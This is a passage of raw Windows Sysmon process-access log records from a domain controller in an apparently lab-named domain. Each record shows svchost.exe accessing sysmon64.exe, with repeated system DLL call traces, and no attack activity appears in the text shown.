d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 